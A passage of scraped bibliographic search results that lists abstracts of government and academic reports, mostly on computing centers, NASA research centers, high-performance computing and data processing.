    sheet metal, machined and composite parts and assembling the components into final pruJucts o Planning, evaluating, testing, inspecting and...Research showed that current programs were pursuing the design and demonstration of integrated centers for sheet metal, machining and composite ...determine any metal parts required and to schedule these requirements from the machining center. Figure 3-33, Planned Composite Production, shows

  6. 3D Object Recognition: Symmetry and Virtual Views

    DTIC Science & Technology

    1992-12-01

    NAME(S) AND ADDRESS(ES) 8. PERFORMING ORGANIZATIONI Artificial Intelligence Laboratory REPORT NUMBER 545 Technology Square AIM 1409 Cambridge... ARTIFICIAL INTELLIGENCE LABORATORY and CENTER FOR BIOLOGICAL AND COMPUTATIONAL LEARNING A.I. Memo No. 1409 December 1992 C.B.C.L. Paper No. 76 3D Object...research done within the Center for Biological and Computational Learning in the Department of Brain and Cognitive Sciences, and at the Artificial

  7. [Automated processing of data from the 1985 population and housing census].

    PubMed

    Cholakov, S

    1987-01-01

    The author describes the method of automated data processing used in the 1985 census of Bulgaria. He notes that the computerization of the census involves decentralization and the use of regional computing centers as well as data processing at the Central Statistical Office's National Information Computer Center. Special attention is given to problems concerning the projection and programming of census data. (SUMMARY IN ENG AND RUS)

  8. Ames Research Center Publications: A Continuing Bibliography

    NASA Technical Reports Server (NTRS)

    1981-01-01

    The Ames Research Center Publications: A Continuing Bibliography contains the research output of the Center indexed during 1981 in Scientific and Technical Aerospace Reports (STAR), Limited Scientific and Technical Aerospace Reports (LSTAR), International Aerospace Abstracts (IAA), and Computer Program Abstracts (CPA). This bibliography is published annually in an attempt to effect greater awareness and distribution of the Center's research output.

  9. Handling of Varied Data Bases in an Information Center Environment.

    ERIC Educational Resources Information Center

    Williams, Martha E.

    Information centers exist to provide information from machine-readable data bases to users in industry, universities and other organizations. The computer Search Center of the IIT Research Institute was designed with a number of variables and uncertainties before it. In this paper, the author discusses how the Center was designed to enable it to…

  10. 76 FR 59803 - Children's Online Privacy Protection Rule

    Federal Register 2010, 2011, 2012, 2013, 2014

    2011-09-27

    ...,'' covering the ``myriad of computer and telecommunications facilities, including equipment and operating..., Dir. and Professor of Computer Sci. and Pub. Affairs, Princeton Univ. (currently Chief Technologist at... data in the manner of a personal computer. See Electronic Privacy Information Center (``EPIC...

  11. System and method for transferring telemetry data between a ground station and a control center

    NASA Technical Reports Server (NTRS)

    Ray, Timothy J. (Inventor); Ly, Vuong T. (Inventor)

    2012-01-01

    Disclosed herein are systems, computer-implemented methods, and tangible computer-readable media for coordinating communications between a ground station, a control center, and a spacecraft. The method receives a call to a simple, unified application programmer interface implementing communications protocols related to outer space, when instruction relates to receiving a command at the control center for the ground station generate an abstract message by agreeing upon a format for each type of abstract message with the ground station and using a set of message definitions to configure the command in the agreed upon format, encode the abstract message to generate an encoded message, and transfer the encoded message to the ground station, and perform similar actions when the instruction relates to receiving a second command as a second encoded message at the ground station from the control center and when the determined instruction type relates to transmitting information to the control center.

  12. Quantum computing with defects.

    PubMed

    Weber, J R; Koehl, W F; Varley, J B; Janotti, A; Buckley, B B; Van de Walle, C G; Awschalom, D D

    2010-05-11

    Identifying and designing physical systems for use as qubits, the basic units of quantum information, are critical steps in the development of a quantum computer. Among the possibilities in the solid state, a defect in diamond known as the nitrogen-vacancy (NV(-1)) center stands out for its robustness--its quantum state can be initialized, manipulated, and measured with high fidelity at room temperature. Here we describe how to systematically identify other deep center defects with similar quantum-mechanical properties. We present a list of physical criteria that these centers and their hosts should meet and explain how these requirements can be used in conjunction with electronic structure theory to intelligently sort through candidate defect systems. To illustrate these points in detail, we compare electronic structure calculations of the NV(-1) center in diamond with those of several deep centers in 4H silicon carbide (SiC). We then discuss the proposed criteria for similar defects in other tetrahedrally coordinated semiconductors.

  13. High Performance Computing Meets Energy Efficiency - Continuum Magazine |

    Science.gov Websites

    NREL High Performance Computing Meets Energy Efficiency High Performance Computing Meets Energy turbines. Simulation by Patrick J. Moriarty and Matthew J. Churchfield, NREL The new High Performance Computing Data Center at the National Renewable Energy Laboratory (NREL) hosts high-speed, high-volume data

  14. Examining the Feasibility and Effect of Transitioning GED Tests to Computer

    ERIC Educational Resources Information Center

    Higgins, Jennifer; Patterson, Margaret Becker; Bozman, Martha; Katz, Michael

    2010-01-01

    This study examined the feasibility of administering GED Tests using a computer based testing system with embedded accessibility tools and the impact on test scores and test-taker experience when GED Tests are transitioned from paper to computer. Nineteen test centers across five states successfully installed the computer based testing program,…

  15. 75 FR 8311 - Privacy Act of 1974; Notice of a Computer Matching Program

    Federal Register 2010, 2011, 2012, 2013, 2014

    2010-02-24

    ...; Notice of a Computer Matching Program AGENCY: Defense Manpower Data Center, DoD. ACTION: Notice of a... hereby giving notice to the record subjects of a computer matching program between the Department of... conduct a computer matching program between the agencies. The purpose of this agreement is to verify an...

  16. Employment Trends in Computer Occupations. Bulletin 2101.

    ERIC Educational Resources Information Center

    Howard, H. Philip; Rothstein, Debra E.

    In 1980 1,455,000 persons worked in computer occupations. Two in five were systems analysts or programmers; one in five was a keypunch operator; one in 20 was a computer service technician; and more than one in three were computer and peripheral equipment operators. Employment was concentrated in major urban centers in four major industry…

  17. Webinar: Delivering Transformational HPC Solutions to Industry

    ScienceCinema

    Streitz, Frederick

    2018-01-16

    Dr. Frederick Streitz, director of the High Performance Computing Innovation Center, discusses Lawrence Livermore National Laboratory computational capabilities and expertise available to industry in this webinar.

  18. Ames Research Center publications: A continuing bibliography, 1980

    NASA Technical Reports Server (NTRS)

    1981-01-01

    This bibliography lists formal NASA publications, journal articles, books, chapters of books, patents, contractor reports, and computer programs that were issued by Ames Research Center and indexed by Scientific and Technical Aerospace Reports, Limited Scientific and Technical Aerospace Reports, International Aerospace Abstracts, and Computer Program Abstracts in 1980. Citations are arranged by directorate, type of publication, and NASA accession numbers. Subject, personal author, corporate source, contract number, and report/accession number indexes are provided.

  19. A Winning Cast

    NASA Technical Reports Server (NTRS)

    2001-01-01

    Howmet Research Corporation was the first to commercialize an innovative cast metal technology developed at Auburn University, Auburn, Alabama. With funding assistance from NASA's Marshall Space Flight Center, Auburn University's Solidification Design Center (a NASA Commercial Space Center), developed accurate nickel-based superalloy data for casting molten metals. Through a contract agreement, Howmet used the data to develop computer model predictions of molten metals and molding materials in cast metal manufacturing. Howmet Metal Mold (HMM), part of Howmet Corporation Specialty Products, of Whitehall, Michigan, utilizes metal molds to manufacture net shape castings in various alloys and amorphous metal (metallic glass). By implementing the thermophysical property data from by Auburn researchers, Howmet employs its newly developed computer model predictions to offer customers high-quality, low-cost, products with significantly improved mechanical properties. Components fabricated with this new process replace components originally made from forgings or billet. Compared with products manufactured through traditional casting methods, Howmet's computer-modeled castings come out on top.

  20. Touch-screen computerized education for patients with brain injuries.

    PubMed

    Patyk, M; Gaynor, S; Kelly, J; Ott, V

    1998-01-01

    The use of computer technology for patient education has increased in recent years. This article describes a study that measures the attitudes and perceptions of healthcare professionals and laypeople regarding the effectiveness of a multimedia computer, the Brain Injury Resource Center (BIRC), as an educational tool. The study focused on three major themes: (a) usefulness of the information presented, (b) effectiveness of the multimedia touch-screen computer methodology, and (c) the appropriate time for making this resource available. This prospective study, conducted in an acute care medical center, obtained healthcare professionals' evaluations using a written survey and responses from patients with brain injury and their families during interviews. The findings have yielded excellent ratings as to the ease of understanding and usefulness of the BIRC. By using sight, sound, and touch, such a multimedia learning center has the potential to simplify patient and family education.

  1. Institute for Computational Mechanics in Propulsion (ICOMP)

    NASA Technical Reports Server (NTRS)

    Feiler, Charles E. (Compiler)

    1993-01-01

    The Institute for Computational Mechanics in Propulsion (ICOMP) was established at the NASA Lewis Research Center in Cleveland, Ohio to develop techniques to improve problem-solving capabilities in all aspects of computational mechanics related to propulsion. The activities at ICOMP during 1992 are described.

  2. Best Practice Guidelines for Computer Technology in the Montessori Early Childhood Classroom.

    ERIC Educational Resources Information Center

    Montminy, Peter

    1999-01-01

    Presents a draft for a principle-centered position statement of a Montessori early childhood program in central Pennsylvania, on the pros and cons of computer use in a Montessori 3-6 classroom. Includes computer software rating form. (Author/KB)

  3. Computer Center: It's Time to Take Inventory.

    ERIC Educational Resources Information Center

    Spain, James D.

    1984-01-01

    Describes typical instructional applications of computers. Areas considered include: (1) instructional simulations and animations; (2) data analysis; (3) drill and practice; (4) student evaluation; (5) development of computer models and simulations; (6) biometrics or biostatistics; and (7) direct data acquisition and analysis. (JN)

  4. Center for Computational Structures Technology

    NASA Technical Reports Server (NTRS)

    Noor, Ahmed K.; Perry, Ferman W.

    1995-01-01

    The Center for Computational Structures Technology (CST) is intended to serve as a focal point for the diverse CST research activities. The CST activities include the use of numerical simulation and artificial intelligence methods in modeling, analysis, sensitivity studies, and optimization of flight-vehicle structures. The Center is located at NASA Langley and is an integral part of the School of Engineering and Applied Science of the University of Virginia. The key elements of the Center are: (1) conducting innovative research on advanced topics of CST; (2) acting as pathfinder by demonstrating to the research community what can be done (high-potential, high-risk research); (3) strong collaboration with NASA scientists and researchers from universities and other government laboratories; and (4) rapid dissemination of CST to industry, through integration of industrial personnel into the ongoing research efforts.

  5. NASA Space Engineering Research Center for VLSI systems design

    NASA Technical Reports Server (NTRS)

    1991-01-01

    This annual review reports the center's activities and findings on very large scale integration (VLSI) systems design for 1990, including project status, financial support, publications, the NASA Space Engineering Research Center (SERC) Symposium on VLSI Design, research results, and outreach programs. Processor chips completed or under development are listed. Research results summarized include a design technique to harden complementary metal oxide semiconductors (CMOS) memory circuits against single event upset (SEU); improved circuit design procedures; and advances in computer aided design (CAD), communications, computer architectures, and reliability design. Also described is a high school teacher program that exposes teachers to the fundamentals of digital logic design.

  6. A Comprehensive Computer Package for Ambulatory Surgical Facilities

    PubMed Central

    Kessler, Robert R.

    1980-01-01

    Ambulatory surgical centers are a cost effective alternative to hospital surgery. Their increasing popularity has contributed to heavy case loads, an accumulation of vast amounts of medical and financial data and economic pressures to maintain a tight control over “cash flow”. Computerization is now a necessity to aid ambulatory surgical centers to maintain their competitive edge. An on-line system is especially necessary as it allows interactive scheduling of surgical cases, immediate access to financial data and rapid gathering of medical and statistical information. This paper describes the significant features of the computer package in use at the Salt Lake Surgical Center, which processes 500 cases per month.

  7. Integration of the Chinese HPC Grid in ATLAS Distributed Computing

    NASA Astrophysics Data System (ADS)

    Filipčič, A.; ATLAS Collaboration

    2017-10-01

    Fifteen Chinese High-Performance Computing sites, many of them on the TOP500 list of most powerful supercomputers, are integrated into a common infrastructure providing coherent access to a user through an interface based on a RESTful interface called SCEAPI. These resources have been integrated into the ATLAS Grid production system using a bridge between ATLAS and SCEAPI which translates the authorization and job submission protocols between the two environments. The ARC Computing Element (ARC-CE) forms the bridge using an extended batch system interface to allow job submission to SCEAPI. The ARC-CE was setup at the Institute for High Energy Physics, Beijing, in order to be as close as possible to the SCEAPI front-end interface at the Computing Network Information Center, also in Beijing. This paper describes the technical details of the integration between ARC-CE and SCEAPI and presents results so far with two supercomputer centers, Tianhe-IA and ERA. These two centers have been the pilots for ATLAS Monte Carlo Simulation in SCEAPI and have been providing CPU power since fall 2015.

  8. New frontiers in design synthesis

    NASA Technical Reports Server (NTRS)

    Goldin, D. S.; Venneri, S. L.; Noor, A. K.

    1999-01-01

    The Intelligent Synthesis Environment (ISE), which is one of the major strategic technologies under development at NASA centers and the University of Virginia, is described. One of the major objectives of ISE is to significantly enhance the rapid creation of innovative affordable products and missions. ISE uses a synergistic combination of leading-edge technologies, including high performance computing, high capacity communications and networking, human-centered computing, knowledge-based engineering, computational intelligence, virtual product development, and product information management. The environment will link scientists, design teams, manufacturers, suppliers, and consultants who participate in the mission synthesis as well as in the creation and operation of the aerospace system. It will radically advance the process by which complex science missions are synthesized, and high-tech engineering Systems are designed, manufactured and operated. The five major components critical to ISE are human-centered computing, infrastructure for distributed collaboration, rapid synthesis and simulation tools, life cycle integration and validation, and cultural change in both the engineering and science creative process. The five components and their subelements are described. Related U.S. government programs are outlined and the future impact of ISE on engineering research and education is discussed.

  9. Networking at NASA. Johnson Space Center

    NASA Technical Reports Server (NTRS)

    Garman, John R.

    1991-01-01

    A series of viewgraphs on computer networks at the Johnson Space Center (JSC) are given. Topics covered include information resource management (IRM) at JSC, the IRM budget by NASA center, networks evolution, networking as a strategic tool, the Information Services Directorate charter, and SSC network requirements, challenges, and status.

  10. Steve Hammond | NREL

    Science.gov Websites

    Hammond Photo of Steven Hammond Steve Hammond Center Director II-Technical Steven.Hammond@nrel.gov | 303-275-4121 Steve Hammond is director of the Computational Science Center at the National Renewable includes leading NREL's efforts in energy efficient data centers. Prior to NREL, Steve managed the

  11. Guidelines for development of NASA (National Aeronautics and Space Administration) computer security training programs

    NASA Technical Reports Server (NTRS)

    Tompkins, F. G.

    1983-01-01

    The report presents guidance for the NASA Computer Security Program Manager and the NASA Center Computer Security Officials as they develop training requirements and implement computer security training programs. NASA audiences are categorized based on the computer security knowledge required to accomplish identified job functions. Training requirements, in terms of training subject areas, are presented for both computer security program management personnel and computer resource providers and users. Sources of computer security training are identified.

  12. Center for Aeronautics and Space Information Sciences

    NASA Technical Reports Server (NTRS)

    Flynn, Michael J.

    1992-01-01

    This report summarizes the research done during 1991/92 under the Center for Aeronautics and Space Information Science (CASIS) program. The topics covered are computer architecture, networking, and neural nets.

  13. Accelerating MP2C dispersion corrections for dimers and molecular crystals

    NASA Astrophysics Data System (ADS)

    Huang, Yuanhang; Shao, Yihan; Beran, Gregory J. O.

    2013-06-01

    The MP2C dispersion correction of Pitonak and Hesselmann [J. Chem. Theory Comput. 6, 168 (2010)], 10.1021/ct9005882 substantially improves the performance of second-order Møller-Plesset perturbation theory for non-covalent interactions, albeit with non-trivial computational cost. Here, the MP2C correction is computed in a monomer-centered basis instead of a dimer-centered one. When applied to a single dimer MP2 calculation, this change accelerates the MP2C dispersion correction several-fold while introducing only trivial new errors. More significantly, in the context of fragment-based molecular crystal studies, combination of the new monomer basis algorithm and the periodic symmetry of the crystal reduces the cost of computing the dispersion correction by two orders of magnitude. This speed-up reduces the MP2C dispersion correction calculation from a significant computational expense to a negligible one in crystals like aspirin or oxalyl dihydrazide, without compromising accuracy.

  14. Jackson State University's Center for Spatial Data Research and Applications: New facilities and new paradigms

    NASA Technical Reports Server (NTRS)

    Davis, Bruce E.; Elliot, Gregory

    1989-01-01

    Jackson State University recently established the Center for Spatial Data Research and Applications, a Geographical Information System (GIS) and remote sensing laboratory. Taking advantage of new technologies and new directions in the spatial (geographic) sciences, JSU is building a Center of Excellence in Spatial Data Management. New opportunities for research, applications, and employment are emerging. GIS requires fundamental shifts and new demands in traditional computer science and geographic training. The Center is not merely another computer lab but is one setting the pace in a new applied frontier. GIS and its associated technologies are discussed. The Center's facilities are described. An ARC/INFO GIS runs on a Vax mainframe, with numerous workstations. Image processing packages include ELAS, LIPS, VICAR, and ERDAS. A host of hardware and software peripheral are used in support. Numerous projects are underway, such as the construction of a Gulf of Mexico environmental data base, development of AI in image processing, a land use dynamics study of metropolitan Jackson, and others. A new academic interdisciplinary program in Spatial Data Management is under development, combining courses in Geography and Computer Science. The broad range of JSU's GIS and remote sensing activities is addressed. The impacts on changing paradigms in the university and in the professional world conclude the discussion.

  15. Voltage profile program for the Kennedy Space Center electric power distribution system

    NASA Technical Reports Server (NTRS)

    1976-01-01

    The Kennedy Space Center voltage profile program computes voltages at all busses greater than 1 Kv in the network under various conditions of load. The computation is based upon power flow principles and utilizes a Newton-Raphson iterative load flow algorithm. Power flow conditions throughout the network are also provided. The computer program is designed for both steady state and transient operation. In the steady state mode, automatic tap changing of primary distribution transformers is incorporated. Under transient conditions, such as motor starts etc., it is assumed that tap changing is not accomplished so that transformer secondary voltage is allowed to sag.

  16. Developmental Stages in School Computer Use: Neither Marx Nor Piaget.

    ERIC Educational Resources Information Center

    Lengel, James G.

    Karl Marx's theory of stages can be applied to computer use in the schools. The first stage, the P Stage, comprises the entry of the computer into the school. Computer use at this stage is personal and tends to center around one personality. Social studies teachers are seldom among this select few. The second stage of computer use, the D Stage, is…

  17. Nontrivial, Nonintelligent, Computer-Based Learning.

    ERIC Educational Resources Information Center

    Bork, Alfred

    1987-01-01

    This paper describes three interactive computer programs used with personal computers to present science learning modules for all ages. Developed by groups of teachers at the Educational Technology Center at the University of California, Irvine, these instructional materials do not use the techniques of contemporary artificial intelligence. (GDC)

  18. Advanced laptop and small personal computer technology

    NASA Technical Reports Server (NTRS)

    Johnson, Roger L.

    1991-01-01

    Advanced laptop and small personal computer technology is presented in the form of the viewgraphs. The following areas of hand carried computers and mobile workstation technology are covered: background, applications, high end products, technology trends, requirements for the Control Center application, and recommendations for the future.

  19. Argonne's Magellan Cloud Computing Research Project

    ScienceCinema

    Beckman, Pete

    2017-12-11

    Pete Beckman, head of Argonne's Leadership Computing Facility (ALCF), discusses the Department of Energy's new $32-million Magellan project, which designed to test how cloud computing can be used for scientific research. More information: http://www.anl.gov/Media_Center/News/2009/news091014a.html

  20. Argonne's Magellan Cloud Computing Research Project

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Beckman, Pete

    Pete Beckman, head of Argonne's Leadership Computing Facility (ALCF), discusses the Department of Energy's new $32-million Magellan project, which designed to test how cloud computing can be used for scientific research. More information: http://www.anl.gov/Media_Center/News/2009/news091014a.html

  1. Computer Operating System Maintenance.

    DTIC Science & Technology

    1982-06-01

    FACILITY The Computer Management Information Facility ( CMIF ) system was developed by Rapp Systems to fulfill the need at the CRF to record and report on...computer center resource usage and utilization. The foundation of the CMIF system is a System 2000 data base (CRFMGMT) which stores and permits access

  2. Computational Nanotechnology Molecular Electronics, Materials and Machines

    NASA Technical Reports Server (NTRS)

    Srivastava, Deepak; Biegel, Bryan A. (Technical Monitor)

    2002-01-01

    This presentation covers research being performed on computational nanotechnology, carbon nanotubes and fullerenes at the NASA Ames Research Center. Topics cover include: nanomechanics of nanomaterials, nanotubes and composite materials, molecular electronics with nanotube junctions, kinky chemistry, and nanotechnology for solid-state quantum computers using fullerenes.

  3. Performance assessment of KORAT-3D on the ANL IBM-SP computer

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Alexeyev, A.V.; Zvenigorodskaya, O.A.; Shagaliev, R.M.

    1999-09-01

    The TENAR code is currently being developed at the Russian Federal Nuclear Center (VNIIEF) as a coupled dynamics code for the simulation of transients in VVER and RBMK systems and other nuclear systems. The neutronic module in this code system is KORAT-3D. This module is also one of the most computationally intensive components of the code system. A parallel version of KORAT-3D has been implemented to achieve the goal of obtaining transient solutions in reasonable computational time, particularly for RBMK calculations that involve the application of >100,000 nodes. An evaluation of the KORAT-3D code performance was recently undertaken on themore » Argonne National Laboratory (ANL) IBM ScalablePower (SP) parallel computer located in the Mathematics and Computer Science Division of ANL. At the time of the study, the ANL IBM-SP computer had 80 processors. This study was conducted under the auspices of a technical staff exchange program sponsored by the International Nuclear Safety Center (INSC).« less

  4. User-Centered Design of Online Learning Communities

    ERIC Educational Resources Information Center

    Lambropoulos, Niki, Ed.; Zaphiris, Panayiotis, Ed.

    2007-01-01

    User-centered design (UCD) is gaining popularity in both the educational and business sectors. This is due to the fact that UCD sheds light on the entire process of analyzing, planning, designing, developing, using, evaluating, and maintaining computer-based learning. "User-Centered Design of Online Learning Communities" explains how…

  5. Planning for the Automation of School Library Media Centers.

    ERIC Educational Resources Information Center

    Caffarella, Edward P.

    1996-01-01

    Geared for school library media specialists whose centers are in the early stages of automation or conversion to a new system, this article focuses on major components of media center automation: circulation control; online public access catalogs; machine readable cataloging; retrospective conversion of print catalog cards; and computer networks…

  6. 28 CFR 523.13 - Community corrections center good time.

    Code of Federal Regulations, 2011 CFR

    2011-07-01

    ... ADMISSION, CLASSIFICATION, AND TRANSFER COMPUTATION OF SENTENCE Extra Good Time § 523.13 Community corrections center good time. Extra good time for an inmate in a Federal or contract Community Corrections... 28 Judicial Administration 2 2011-07-01 2011-07-01 false Community corrections center good time...

  7. 28 CFR 523.13 - Community corrections center good time.

    Code of Federal Regulations, 2010 CFR

    2010-07-01

    ... ADMISSION, CLASSIFICATION, AND TRANSFER COMPUTATION OF SENTENCE Extra Good Time § 523.13 Community corrections center good time. Extra good time for an inmate in a Federal or contract Community Corrections... 28 Judicial Administration 2 2010-07-01 2010-07-01 false Community corrections center good time...

  8. 28 CFR 523.13 - Community corrections center good time.

    Code of Federal Regulations, 2014 CFR

    2014-07-01

    ... ADMISSION, CLASSIFICATION, AND TRANSFER COMPUTATION OF SENTENCE Extra Good Time § 523.13 Community corrections center good time. Extra good time for an inmate in a Federal or contract Community Corrections... 28 Judicial Administration 2 2014-07-01 2014-07-01 false Community corrections center good time...

  9. 28 CFR 523.13 - Community corrections center good time.

    Code of Federal Regulations, 2012 CFR

    2012-07-01

    ... ADMISSION, CLASSIFICATION, AND TRANSFER COMPUTATION OF SENTENCE Extra Good Time § 523.13 Community corrections center good time. Extra good time for an inmate in a Federal or contract Community Corrections... 28 Judicial Administration 2 2012-07-01 2012-07-01 false Community corrections center good time...

  10. 28 CFR 523.13 - Community corrections center good time.

    Code of Federal Regulations, 2013 CFR

    2013-07-01

    ... ADMISSION, CLASSIFICATION, AND TRANSFER COMPUTATION OF SENTENCE Extra Good Time § 523.13 Community corrections center good time. Extra good time for an inmate in a Federal or contract Community Corrections... 28 Judicial Administration 2 2013-07-01 2013-07-01 false Community corrections center good time...

  11. A Computer-Based System Integrating Instruction and Information Retrieval: A Description of Some Methodological Considerations.

    ERIC Educational Resources Information Center

    Selig, Judith A.; And Others

    This report, summarizing the activities of the Vision Information Center (VIC) in the field of computer-assisted instruction from December, 1966 to August, 1967, describes the methodology used to load a large body of information--a programed text on basic opthalmology--onto a computer for subsequent information retrieval and computer-assisted…

  12. 76 FR 14669 - Privacy Act of 1974; CMS Computer Match No. 2011-02; HHS Computer Match No. 1007

    Federal Register 2010, 2011, 2012, 2013, 2014

    2011-03-17

    ... (CMS); and Department of Defense (DoD), Manpower Data Center (DMDC), Defense Enrollment and Eligibility... the results of the computer match and provide the information to TMA for use in its matching program... under TRICARE. DEERS will receive the results of the computer match and provide the information provided...

  13. 76 FR 50460 - Privacy Act of 1974; Notice of a Computer Matching Program

    Federal Register 2010, 2011, 2012, 2013, 2014

    2011-08-15

    ...; Notice of a Computer Matching Program AGENCY: Defense Manpower Data Center, Department of Defense (DoD). ACTION: Notice of a Computer Matching Program. SUMMARY: Subsection (e)(12) of the Privacy Act of 1974, as amended, (5 U.S.C. 552a) requires agencies to publish advance notice of any proposed or revised computer...

  14. 76 FR 77811 - Privacy Act of 1974; Notice of a Computer Matching Program

    Federal Register 2010, 2011, 2012, 2013, 2014

    2011-12-14

    ...; Notice of a Computer Matching Program AGENCY: Defense Manpower Data Center, Department of Defense (DoD). ACTION: Notice of a Computer Matching Program. SUMMARY: Subsection (e)(12) of the Privacy Act of 1974, as amended, (5 U.S.C. 552a) requires agencies to publish advance notice of any proposed or revised computer...

  15. ARC-2009-ACD09-0208-004

    NASA Image and Video Library

    2009-09-15

    Obama Administration launches Cloud Computing Initiative at Ames Research Center with left to right; S. Pete Worden, Center Director, Lori Garver, NASA Deputy Administrator, Vivek Kundra, White House Chief Federal Information Officer

  16. 77 FR 11139 - Center for Scientific Review; Notice of Closed Meetings

    Federal Register 2010, 2011, 2012, 2013, 2014

    2012-02-24

    ...: Center for Scientific Review Special Emphasis Panel; ``Genetics and Epigenetics of Disease.'' Date: March... Scientific Review Special Emphasis Panel; Small Business: Cell, Computational, and Molecular Biology. Date...

  17. Biomedical Computing Technology Information Center: introduction and report of early progress

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Maskewitz, B.F.; Henne, R.L.; McClain, W.J.

    1976-01-01

    In July 1975, the Biomedical Computing Technology Information Center (BCTIC) was established by the Division of Biomedical and Environmental Research of the U. S. Energy Research and Development Administration (ERDA) at the Oak Ridge National Laboratory. BCTIC collects, organizes, evaluates, and disseminates information on computing technology pertinent to biomedicine, providing needed routes of communication between installations and serving as a clearinghouse for the exchange of biomedical computing software, data, and interface designs. This paper presents BCTIC's functions and early progress to the MUMPS Users' Group in order to stimulate further discussion and cooperation between the two organizations. (BCTIC services aremore » available to its sponsors and their contractors and to any individual/group willing to participate in mutual exchange.) 1 figure.« less

  18. DOE Office of Scientific and Technical Information (OSTI.GOV)

    Tierney, Brian; Dart, Eli; Tierney, Brian

    The Energy Sciences Network (ESnet) is the primary provider of network connectivity for the U.S. Department of Energy Office of Science, the single largest supporter of basic research in the physical sciences in the United States of America. In support of the Office of Science programs, ESnet regularly updates and refreshes its understanding of the networking requirements of the instruments, facilities, scientists, and science programs that it serves. This focus has helped ESnet to be a highly successful enabler of scientific discovery for over 20 years. In March 2008, ESnet and the Fusion Energy Sciences (FES) Program Office of themore » DOE Office of Science organized a workshop to characterize the networking requirements of the science programs funded by the FES Program Office. Most sites that conduct data-intensive activities (the Tokamaks at GA and MIT, the supercomputer centers at NERSC and ORNL) show a need for on the order of 10 Gbps of network bandwidth for FES-related work within 5 years. PPPL reported a need for 8 times that (80 Gbps) in that time frame. Estimates for the 5-10 year time period are up to 160 Mbps for large simulations. Bandwidth requirements for ITER range from 10 to 80 Gbps. In terms of science process and collaboration structure, it is clear that the proposed Fusion Simulation Project (FSP) has the potential to significantly impact the data movement patterns and therefore the network requirements for U.S. fusion science. As the FSP is defined over the next two years, these changes will become clearer. Also, there is a clear and present unmet need for better network connectivity between U.S. FES sites and two Asian fusion experiments--the EAST Tokamak in China and the KSTAR Tokamak in South Korea. In addition to achieving its goal of collecting and characterizing the network requirements of the science endeavors funded by the FES Program Office, the workshop emphasized that there is a need for research into better ways of conducting remote collaboration with the control room of a Tokamak running an experiment. This is especially important since the current plans for ITER assume that this problem will be solved.« less

  19. A nominally second-order cell-centered Lagrangian scheme for simulating elastic-plastic flows on two-dimensional unstructured grids

    NASA Astrophysics Data System (ADS)

    Maire, Pierre-Henri; Abgrall, Rémi; Breil, Jérôme; Loubère, Raphaël; Rebourcet, Bernard

    2013-02-01

    In this paper, we describe a cell-centered Lagrangian scheme devoted to the numerical simulation of solid dynamics on two-dimensional unstructured grids in planar geometry. This numerical method, utilizes the classical elastic-perfectly plastic material model initially proposed by Wilkins [M.L. Wilkins, Calculation of elastic-plastic flow, Meth. Comput. Phys. (1964)]. In this model, the Cauchy stress tensor is decomposed into the sum of its deviatoric part and the thermodynamic pressure which is defined by means of an equation of state. Regarding the deviatoric stress, its time evolution is governed by a classical constitutive law for isotropic material. The plasticity model employs the von Mises yield criterion and is implemented by means of the radial return algorithm. The numerical scheme relies on a finite volume cell-centered method wherein numerical fluxes are expressed in terms of sub-cell force. The generic form of the sub-cell force is obtained by requiring the scheme to satisfy a semi-discrete dissipation inequality. Sub-cell force and nodal velocity to move the grid are computed consistently with cell volume variation by means of a node-centered solver, which results from total energy conservation. The nominally second-order extension is achieved by developing a two-dimensional extension in the Lagrangian framework of the Generalized Riemann Problem methodology, introduced by Ben-Artzi and Falcovitz [M. Ben-Artzi, J. Falcovitz, Generalized Riemann Problems in Computational Fluid Dynamics, Cambridge Monogr. Appl. Comput. Math. (2003)]. Finally, the robustness and the accuracy of the numerical scheme are assessed through the computation of several test cases.

  20. Yahoo! Compute Coop (YCC). A Next-Generation Passive Cooling Design for Data Centers

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Robison, AD; Page, Christina; Lytle, Bob

    The purpose of the Yahoo! Compute Coop (YCC) project is to research, design, build and implement a greenfield "efficient data factory" and to specifically demonstrate that the YCC concept is feasible for large facilities housing tens of thousands of heat-producing computing servers. The project scope for the Yahoo! Compute Coop technology includes: - Analyzing and implementing ways in which to drastically decrease energy consumption and waste output. - Analyzing the laws of thermodynamics and implementing naturally occurring environmental effects in order to maximize the "free-cooling" for large data center facilities. "Free cooling" is the direct usage of outside air tomore » cool the servers vs. traditional "mechanical cooling" which is supplied by chillers or other Dx units. - Redesigning and simplifying building materials and methods. - Shortening and simplifying build-to-operate schedules while at the same time reducing initial build and operating costs. Selected for its favorable climate, the greenfield project site is located in Lockport, NY. Construction on the 9.0 MW critical load data center facility began in May 2009, with the fully operational facility deployed in September 2010. The relatively low initial build cost, compatibility with current server and network models, and the efficient use of power and water are all key features that make it a highly compatible and globally implementable design innovation for the data center industry. Yahoo! Compute Coop technology is designed to achieve 99.98% uptime availability. This integrated building design allows for free cooling 99% of the year via the building's unique shape and orientation, as well as server physical configuration.« less

  1. Development of user-centered interfaces to search the knowledge resources of the Virginia Henderson International Nursing Library.

    PubMed

    Jones, Josette; Harris, Marcelline; Bagley-Thompson, Cheryl; Root, Jane

    2003-01-01

    This poster describes the development of user-centered interfaces in order to extend the functionality of the Virginia Henderson International Nursing Library (VHINL) from library to web based portal to nursing knowledge resources. The existing knowledge structure and computational models are revised and made complementary. Nurses' search behavior is captured and analyzed, and the resulting search models are mapped to the revised knowledge structure and computational model.

  2. Human Centered Design and Development for NASA's MerBoard

    NASA Technical Reports Server (NTRS)

    Trimble, Jay

    2003-01-01

    This viewgraph presentation provides an overview of the design and development process for NASA's MerBoard. These devices are large interactive display screens which can be shown on the user's computer, which will allow scientists in many locations to interpret and evaluate mission data in real-time. These tools are scheduled to be used during the 2003 Mars Exploration Rover (MER) expeditions. Topics covered include: mission overview, Mer Human Centered Computers, FIDO 2001 observations and MerBoard prototypes.

  3. Payload Operations Control Center (POCC). [spacelab flight operations

    NASA Technical Reports Server (NTRS)

    Shipman, D. L.; Noneman, S. R.; Terry, E. S.

    1981-01-01

    The Spacelab payload operations control center (POCC) timeline analysis program which is used to provide POCC activity and resource information as a function of mission time is described. This program is fully automated and interactive, and is equipped with tutorial displays. The tutorial displays are sufficiently detailed for use by a program analyst having no computer experience. The POCC timeline analysis program is designed to operate on the VAX/VMS version V2.1 computer system.

  4. Development of computational methods for unsteady aerodynamics at the NASA Langley Research Center

    NASA Technical Reports Server (NTRS)

    Yates, E. Carson, Jr.; Whitlow, Woodrow, Jr.

